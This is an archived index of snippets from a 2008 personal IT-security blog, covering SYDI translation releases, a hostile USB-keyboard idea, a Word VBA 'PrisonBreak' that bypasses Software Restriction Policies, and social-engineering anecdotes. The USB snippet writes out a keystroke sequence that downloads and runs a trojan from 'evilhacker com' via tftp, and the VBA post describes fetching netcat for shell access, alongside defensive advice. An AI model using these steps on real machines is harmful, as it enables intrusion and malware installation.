web-archive-net.com » NET » O » OGENSTAD.NET

Total: 47

  • SYDI
    German support for SYDI and the impact of translations (February 12, 2008, by patrick ogenstad): German has joined the ranks of languages you can use with SYDI Server. The file will be included in the next version of SYDI Server. Until then it is available for download through the download page. Thanks to Jan Picard, who has made the translation file. Filed under: SYDI. Tagged with: network documentation, SYDI, translations.
    Danish Language File for SYDI Server (February 5, 2008, by patrick ogenstad): Thanks to Morten Vitved we now have a Danish language file for SYDI. This means we can now translate the XML files generated by SYDI Server in seven different languages. The file will be included in the next version of SYDI Server; until that time you can download it as a patch from the SYDI download page. Filed under: SYDI. Tagged with: network documentation, SYDI, translation.
    SYDI Server 2.1 Released (January 30, 2008, by patrick ogenstad): Around 1.5 years has passed since I released SYDI Server 2.0 and now I've finally gotten my act together

    Original URL path: http://ogenstad.net/tag/sydi/ (2016-05-01)


  • How far do you trust an unknown USB Stick?
    came to be while listening to the Pilot episode of the Securabit Podcast (thanks to Martin for pointing to the Podcast). In this episode they talk about YubiKey. The YubiKey is a USB authentication solution; when you plug in the YubiKey USB device to your computer it is recognized as a USB keyboard. It has one button, and when pressed it enters a one-time password. I won't go into any details, but if you're interested you can watch a one minute video on the YubiKey site or listen to the Securabit Podcast. The product got me thinking: what if someone were to make a device that looks like a USB stick but in fact is a USB keyboard, just like the YubiKey? However, instead of being programmed to enter a random password string, it was made to enter a malicious string of characters. For example, an attacker might choose to target a Windows box with these characters: windows r cmd exe enter tftp i evilhacker com GET trojan exe temp trojan exe enter temp trojan exe enter exit enter. This would install a trojan on the target computer, assuming the user is allowed to run tftp, simply because

    Original URL path: http://ogenstad.net/2008/09/11/how-far-do-you-trust-an-unknown-usb-stick/ (2016-05-01)

  • Security
    have to create the macro ourselves on the fly each time we want to run macros. See the difference? The security setting in Word doesn't disallow you to create and run your own macros. If we would save the document and open it again, then the security setting would kick in and disallow the macro. If we had signed it before saving, then we would be allowed to run it. In order to prevent this we would have to have a setting in Office called "Don't Allow Users to Develop Macros".
    VBA PrisonBreak
    I named the macro I created VBA PrisonBreak (I must have been watching too much TV). You can download the VBA PrisonBreak from here. To test it in your environment, open up Microsoft Word and press Alt+F11 to enter the VBA editor. Double click on "This Document". This will give you a code window on the right side. Copy the contents from the VBA PrisonBreak txt file and paste it in the window. The file contains different subroutines, or programs if you will. To run one of these programs you set the cursor somewhere after the Sub Program and before the End statement. To execute the program you press Play or F5. To give it a try and test something harmless, start the routine called RunCommand and enter ping 127.0.0.1. When the command is completed, go back to the Word document. If everything worked out as it should, you will see which command you tried to run and the results. Let's see if we can poke around a bit: cmd /c dir. Hm, this won't work unless we have command prompt scripting allowed. Then again, we can create scripts of our own and run them instead. Another subroutine of VBA PrisonBreak is called ListFilesinFolder and takes a directory as an argument. This is just a simple example, but a lot can be accomplished by scripting. So we haven't done anything terribly exciting. The commands we can run by using the RunCommand routine depend on a few factors; we will look at the Software Restriction Policies. We know we can run Word, but what about the default additional ones? Among others this includes commands under c:\windows and c:\windows\system32. net view and net user /domain might be interesting and could give us some information. After looking around we might come to the conclusion that we want to run a command which isn't allowed by the software restriction policy. As a normal unprivileged user we will not have write access to c:\windows or c:\windows\system32, so we can't place any files in those directories. But in our configuration we have write access to c:\windows\temp, and even better, CREATOR OWNER has Full Control. If we can place a file in this directory we will be able to run it with RunCommand by entering C:\windows\temp\mycommand.exe. Now how would we place a file there? We can't just use copy since cmd.exe is blocked. We might be able to use xcopy or tftp. If tftp isn't available we might still be able to expand.exe it from c:\windows\i386\tftp.ex_. There is also a function in VBA PrisonBreak which lets you download files through http: HTTPDownload. It takes source url and target file as arguments. From here we can download netcat and gain shell access to the server. Note that cmd.exe is still restricted; unfortunately an attacker can use another file or edit a version of cmd.exe. This edited shell file can then be placed under c:\windows\temp. It is important to realize that the credentials used in this shell will be that of the unprivileged user account.
    How to Protect Yourself
    It's really easy to protect yourself against this feature (remember, this is not a vulnerability or an exploit in Windows or Word). We are trying to remove features from Windows, such as disabling cmd.exe, since the features we want to remove can be used in harmful ways. When you install Office you don't have to install all the features; one of these features is vba (Visual Basic for Applications). Without vba this prison break wouldn't be possible in the way I've described. You can find information about this in the Office Security pages. However, as you can see on the page, Microsoft recommends that you don't disable vba and also lists the reasons why, so you have to decide for yourself. This page also mentions the very high macro setting, but remember what I said before: this setting doesn't apply in this context. Another option is to disable vba through group policies. You can do this by using the ADM files for Microsoft Office. This is only an option if you won't be using any macros. Even if your business requires you to be able to run vba, I have three words for you: Defense in Depth. If one part of the system fails, this shouldn't mean that the defense has been breached. The default Software Restriction Policies obviously didn't restrict as much as we would have hoped. We will definitely want to explore these settings. If a user has write and execute permissions to any location within a SRP Path rule, that user can run whatever he wants. You could set up deny rules for these directories, or you could tighten the NTFS permissions and remove execute permissions. It would be nice if the default policies provided some sort of protection, at least since Microsoft has written in several places that they shouldn't be changed unless you are an advanced user. But the Software Restriction Policies can be fixed, and in this case that's not really the problem. Since we can write VBA code we have a lot of options. VBA PrisonBreak is mostly a proof of concept

    Original URL path: http://ogenstad.net/category/security/ (2016-05-01)

  • Social Engineering
    parking lot. Perhaps this would scare you enough to disable autorun throughout your domain; you've done that, right? Now imagine if someone gave one of your users a USB device which was connected to a workstation on your network and in turn your network was compromised. How would you explain that? Filed under: Security. Tagged with: Social Engineering. Social Engineering on the Train (August 19, 2008, by

    Original URL path: http://ogenstad.net/tag/social-engineering/ (2016-05-01)

  • Social Engineering on the Train
    know which the new passengers were. They wouldn't bug the existing passengers who had already shown their ticket. When I was a child I thought they must be superhuman, that they either had fantastic memory or were absolutely brilliant at what they did. Traveling on the same trains now, I can see it so easily. The train conductors don't ask me for my ticket anymore, though they ask everyone around me. I still have a monthly pass, as it would go against my morals not to have a valid ticket; besides, I also use it to ride the bus and the subways. I just find it interesting to experiment with social engineering in a harmless environment. What I noticed was that when the train conductor entered the wagon, all the new passengers would reach for their tickets. Everyone who had already shown his ticket just ignored the train conductor. In reality the train conductors aren't looking for new passengers; they are looking for people who want to show their tickets, or rather they are looking for people who behave in a certain way. So if I just ignore them when they come, they ignore me. I've also tried looking at them, even having eye contact and smiling. As long as I don't reach for my ticket I'm safe. Looking at this from a security perspective, they are very poor security guards. Their job is to protect the resource (train ride) from unauthorized use (passengers who don't pay). Of course, taking this one step further, this could be according to plan in the name of user friendliness, as in: don't bug and annoy users who have already shown their pass. I would put my money on the former explanation. In terms of social

    Original URL path: http://ogenstad.net/2008/08/19/social-engineering-on-the-train/ (2016-05-01)

  • Security Policy
    my blog. For current updates head over to Networklore. Social Engineering on the Train (August 19, 2008, by patrick ogenstad): During your childhood I'm sure you experienced a lot of magic; some things were just so fantastic and mind boggling you just couldn't figure it out. For me, one of these extraordinary events was the work of train conductors

    Original URL path: http://ogenstad.net/tag/security-policy/ (2016-05-01)

  • German support for SYDI and the impact of translations
    next version of SYDI Server. Until then it is available for download through the download page. Thanks to Jan Picard, who has made the translation file. So now we can translate the xml files generated by SYDI Server to eight different languages. Though this is good if your organization doesn't use English as its primary language, it will mean that in order to keep the SYDI Server package completely updated I will have to keep in touch with more people and involve more people each time I make a change. This is one of the reasons why there weren't any new features in the core sydi server script in the 2.1 version. This is not the way I want it to be, i.e. I see having more translations as a good thing, but still the rest of the project shouldn't have to suffer for it. Because of this I won't cross mountains in order to get updated translation files for each language, since it could delay future releases more than necessary. The way I plan to solve this is to create a new package for the translations file and just release those packages more

    Original URL path: http://ogenstad.net/2008/02/12/german-support-for-sydi-and-the-impact-of-translations/ (2016-05-01)

  • translations
    For current updates head over to Networklore. German support for SYDI and the impact of translations (February 12, 2008, by patrick ogenstad): German has joined the ranks of languages you can use with SYDI Server. The file will be included in the next version of SYDI Server. Until then it is available for download through the download page. Thanks to

    Original URL path: http://ogenstad.net/tag/translations/ (2016-05-01)